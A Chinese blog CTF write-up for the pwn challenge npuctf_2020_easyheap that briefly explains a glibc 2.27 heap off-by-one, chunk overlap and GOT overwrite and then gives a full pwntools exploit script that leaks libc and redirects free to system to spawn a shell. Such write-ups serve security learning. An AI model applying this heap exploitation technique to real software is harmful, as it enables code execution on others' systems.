npuctf_2020_easyheap

最新推荐文章于 2022-05-30 20:43:52 发布
最新推荐文章于 2022-05-30 20:43:52 发布
阅读量664 收藏
点赞数
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122246246
版权

npuctf_2020_easyheap

查看保护
请添加图片描述
请添加图片描述
2.27下的0ff-by-one。overlapping改指针为got,泄露出libc之后直接edit这个got为system即可。off-by-one具体看z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29274)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice :'

def add(size, content):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
    r.sendafter('Content:', content)

def edit(index, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index :', str(index))
    r.sendafter('Content: ', content)

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index :', str(index))

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index :', str(index))

add(0x18, 'aaaa')   #0
add(0x18, 'bbbb')   #1
add(0x18, '/bin/sh\x00')   #2

p1 = b'a' * 0x18 + b'\x41'
edit(0, p1)

delete(1)

free_got = elf.got['free']
p2 = b'a' * 0x10 + p64(0) + p64(0x21) + p64(0x38) + p64(free_got)
add(0x38, p2)

show(1)

free_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('free_addr = ' + hex(free_addr))
libc = ELF('libc-2.27.so')
libc_base = free_addr - libc.sym['free']
system_addr = libc_base + libc.sym['system']

p3 = p64(system_addr)
edit(1, p3)

delete(2)

r.interactive()
z1r0.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
npu初学者参考代码
08-16
了解npu工作原理和使用的参考代码,欢迎大家下载使用!
C刷题记录-1012
weixin_30252709的博客
11-07 85
题目描述 输入一行字符,分别统计出其中英文字母、数字、空格和其他字符的个数。 输入 一行字符 输出统计值 样例输入 aklsjflj123 sadf918u324 asdf91u32oasdf/.';123 样例输出 23 16 2 4 1 #include <stdio.h> 2 3...
NPU基础
yiyayiya557的博客
08-12 1293
参考文章 华为IoT首席架构师王启军:全栈工程师“养成记” https://blog.csdn.net/devcloud/article/details/104062264 华为昇腾处理器和mindspore开源框架 官方资料 https://www.mindspore.cn/docs/en/master/architecture.html MindSpore is a new open source deep learning training/inference framework htt
基于华为自研NPU Ascend 910的TensorFlow 1.x训练脚本迁移和使能混合精度记录
qq_40679625的博客
05-30 1491
简介 基于 TesorFlow 1.x 以 Sess.run 形式搭建入门级——手写数字分类网络,并迁移到 华为自研NPU Ascend 910,同时使能混合精度。 硬件介绍 华为自研 NPU Ascend 910,即昇腾 910 AI 处理器(简称NPU),根据官方介绍,是在2019年发布的人工智能(AI)专用的神经网络处理器,其算力高达256T,最新款算力高达310T,是业界主流芯片算力的2倍。当前业界大多数训练脚本基于 TensorFlow 的 Python API 开发,默认运行在 CPU/GPU/
npuctf_2020_easyheap详解
像初雪一样自由洒落
04-25 802
off by one的题,,, 参考视频:off by one + 改got表的heap做法 例题:npuctf_2020_easyheap 程序流程 create: 申请两个chunk: 一个heaparray[i](固定0x10大小),一个是申请的大小(只能申请0x18或0x38) edit: read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL); 存在off by one show:根据id.
BUUCTF-PWN刷题记录-16
weixin_44145820的博客
05-05 705
目录ciscn_2019_es_5(realloc double free)npuctf_2020_easyheap(off-by-one) ciscn_2019_es_5(realloc double free) 申请没有大小限制,数目上限为10 edit会调用realloc重新申请(其实不会的,因为大小不变) 如果edit就不能show了 看了一下这题没有什么明显漏洞,但是考虑到re...
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4756
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
NPUCTF pwn
doudoudedi
04-21 746
题目质量很高萌新直接自闭 z这2道题都挺基础的 easy_heap exp: off by one 造成了任意地址写的漏洞 #!/usr/bin/python2 from pwn import * p=0 def pwn(): global p #p=process('./pwn') p=remote('ha1cyon-ctf.fun',30179) elf=ELF('./pwn') l...
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
解读“模块的沟通”
08-04
我在写Verilog的时候,经常会用到一种方法(这一种方法是akuei2发明的)为了大家能看懂我的程序。
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
NPUCTF 2020 Crypto writeup
Slightwind's Blog
04-24 3491
认清形势,建立信心 题目中给了 2e mod n2^e \ mod \ n2e mod n, 4e mod p4^e \ mod \ p4e mod p 和 8e mod p8^e \ mod \ p8e mod p。令它们分别为 ...
[BUUCTF]PWN——npuctf_2020_easyheap
mcmuyanga的博客
01-20 736
npuctf_2020_easyheap 附件 步骤: 例行检查
51单片机控制步进电机三轴联动51单片机控制步进电机三轴联动51单片机控制步进电机3轴联动c语言,抛砖引玉供大家参考。.zip
最新发布
06-16
51单片机控制步进电机三轴联动51单片机控制步进电机三轴联动51单片机控制步进电机3轴联动c语言,抛砖引玉供大家参考。
数据库管理工具:dbeaver-ce-23.0.1-linux.gtk.aarch64-nojdk.tar.gz
06-16
1.DBeaver是一款通用数据库工具,专为开发人员和数据库管理员设计。 2.DBeaver支持多种数据库系统,包括但不限于MySQL、PostgreSQL、Oracle、DB2、MSSQL、Sybase、Mimer、HSQLDB、Derby、SQLite等,几乎涵盖了市场上所有的主流数据库。 3.支持的操作系统:包括Windows(2000/XP/2003/Vista/7/10/11)、Linux、Mac OS、Solaris、AIX、HPUX等。 4.主要特性: 数据库管理:支持数据库元数据浏览、元数据编辑(包括表、列、键、索引等)、SQL语句和脚本的执行、数据导入导出等。 用户界面:提供图形界面来查看数据库结构、执行SQL查询和脚本、浏览和导出数据,以及处理BLOB/CLOB数据等。用户界面设计简洁明了,易于使用。 高级功能:除了基本的数据库管理功能外,DBeaver还提供了一些高级功能,如数据库版本控制(可与Git、SVN等版本控制系统集成)、数据分析和可视化工具(如图表、统计信息和数据报告)、SQL代码自动补全等。
数据库管理工具:dbeaver-ce-23.1.5-macos-x86-64.dmg
06-16
1.DBeaver是一款通用数据库工具,专为开发人员和数据库管理员设计。 2.DBeaver支持多种数据库系统,包括但不限于MySQL、PostgreSQL、Oracle、DB2、MSSQL、Sybase、Mimer、HSQLDB、Derby、SQLite等,几乎涵盖了市场上所有的主流数据库。 3.支持的操作系统:包括Windows(2000/XP/2003/Vista/7/10/11)、Linux、Mac OS、Solaris、AIX、HPUX等。 4.主要特性: 数据库管理:支持数据库元数据浏览、元数据编辑(包括表、列、键、索引等)、SQL语句和脚本的执行、数据导入导出等。 用户界面:提供图形界面来查看数据库结构、执行SQL查询和脚本、浏览和导出数据,以及处理BLOB/CLOB数据等。用户界面设计简洁明了,易于使用。 高级功能:除了基本的数据库管理功能外,DBeaver还提供了一些高级功能,如数据库版本控制(可与Git、SVN等版本控制系统集成)、数据分析和可视化工具(如图表、统计信息和数据报告)、SQL代码自动补全等。
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值